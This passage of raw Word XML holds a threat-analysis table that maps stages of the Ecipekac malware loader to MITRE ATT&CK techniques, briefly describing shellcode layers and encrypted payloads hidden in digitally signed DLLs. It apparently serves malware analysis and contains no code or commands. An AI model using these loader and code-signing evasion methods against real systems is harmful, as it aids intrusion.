                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="786DFE53" w14:textId="77777777" w:rsidR="00E610D9" w:rsidRPr="00B857D7" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EC2A439" w14:textId="77777777" w:rsidR="00E610D9" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C22F219" w14:textId="23A3304D" w:rsidR="00E610D9" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63AEAFA7" w14:textId="62EA6210" w:rsidR="00E610D9" w:rsidRPr="008D6D8A" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Ecipekac</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Layer II loader is a simple shellcode which contains the data of the next layer DLL in disordered parts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D33D1" w:rsidRPr="00B857D7" w14:paraId="2058A9D4" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="274F8C68" w14:textId="3F626BE3" w:rsidR="00E610D9" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31CA36CB" w14:textId="77777777" w:rsidR="00E610D9" w:rsidRPr="00B857D7" w:rsidRDefault="00E610D9"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35A4C863" w14:textId="77777777" w:rsidR="00E610D9" w:rsidRPr="00B857D7" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DA8521D" w14:textId="307B007A" w:rsidR="00E610D9" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D62D557" w14:textId="77777777" w:rsidR="00E610D9" w:rsidRPr="00B857D7" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="239F23ED" w14:textId="77777777" w:rsidR="00E610D9" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B321337" w14:textId="77777777" w:rsidR="00E610D9" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B17EFD6" w14:textId="04488AE1" w:rsidR="00E610D9" w:rsidRPr="008D6D8A" w:rsidRDefault="00E610D9" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D33D1" w:rsidRPr="00B857D7" w14:paraId="31809BFA" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7424FA5D" w14:textId="53F6632D" w:rsidR="00720F1A" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49A5BFF7" w14:textId="77777777" w:rsidR="00720F1A" w:rsidRPr="00B857D7" w:rsidRDefault="00720F1A"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76C23C12" w14:textId="77777777" w:rsidR="00720F1A" w:rsidRPr="00B857D7" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006621ED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1553.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006621ED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Subvert Trust Controls&gt;:Code Signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14877A79" w14:textId="3C96980A" w:rsidR="00720F1A" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C723838" w14:textId="77777777" w:rsidR="00720F1A" w:rsidRPr="00B857D7" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34E38207" w14:textId="77777777" w:rsidR="00720F1A" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17001D8A" w14:textId="77777777" w:rsidR="00720F1A" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A79E62F" w14:textId="77777777" w:rsidR="00720F1A" w:rsidRPr="008D6D8A" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A62D27" w:rsidRPr="00B857D7" w14:paraId="4DE442C2" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02AD04B0" w14:textId="4B1FF8A5" w:rsidR="00A62D27" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42997C53" w14:textId="15AEFF01" w:rsidR="00A62D27" w:rsidRPr="00B857D7" w:rsidRDefault="002D2647" w:rsidP="00DD0478">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0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15435253" w14:textId="05EAB8C9" w:rsidR="00A62D27" w:rsidRPr="00B857D7" w:rsidRDefault="002D2647" w:rsidP="00DD0478">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1129</w:t>
            </w:r>
            <w:r w:rsidR="0097055C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Shared Modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52BA0049" w14:textId="2CBC4E85" w:rsidR="00A62D27" w:rsidRDefault="00211C7C" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44A9CAF5" w14:textId="77777777" w:rsidR="00A62D27" w:rsidRPr="00B857D7" w:rsidRDefault="00A62D27" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40DBFC0F" w14:textId="50FC12AC" w:rsidR="00A62D27" w:rsidRDefault="002D2647" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5261AA3C" w14:textId="75CB206A" w:rsidR="00A62D27" w:rsidRDefault="002D2647" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07CC9106" w14:textId="37F2398B" w:rsidR="00A62D27" w:rsidRPr="008D6D8A" w:rsidRDefault="002D2647" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] Run above DLL</w:t>
            </w:r>
            <w:r w:rsidR="007264AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Layer III)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D33D1" w:rsidRPr="00B857D7" w14:paraId="2BD32DD7" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="050F5480" w14:textId="2C0E0FB9" w:rsidR="007264AD" w:rsidRDefault="007264AD" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00720F1A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38296FCB" w14:textId="77777777" w:rsidR="007264AD" w:rsidRPr="00B857D7" w:rsidRDefault="007264AD"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28B2888D" w14:textId="77777777" w:rsidR="007264AD" w:rsidRPr="00B857D7" w:rsidRDefault="007264AD" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="642D5FD6" w14:textId="0999855C" w:rsidR="007264AD" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BC2940C" w14:textId="77777777" w:rsidR="007264AD" w:rsidRPr="00B857D7" w:rsidRDefault="007264AD" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32B65B24" w14:textId="77777777" w:rsidR="007264AD" w:rsidRDefault="007264AD" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18D33232" w14:textId="77777777" w:rsidR="007264AD" w:rsidRDefault="007264AD" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="793971E4" w14:textId="0EAD6434" w:rsidR="007264AD" w:rsidRPr="008D6D8A" w:rsidRDefault="007264AD" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="007264AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The third layer’s method of loading the next layer resembles the first layer. It reads encrypted data from the end of ‘pcasvc.dll’, which is </w:t>
            </w:r>
            <w:r w:rsidRPr="007264AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>signed using a digital certificate as is the case with ‘vac.dll’.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D33D1" w:rsidRPr="00B857D7" w14:paraId="7D56C05D" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E6BC3A0" w14:textId="4B6C88A3" w:rsidR="00720F1A" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="673CBEBE" w14:textId="77777777" w:rsidR="00720F1A" w:rsidRPr="00B857D7" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
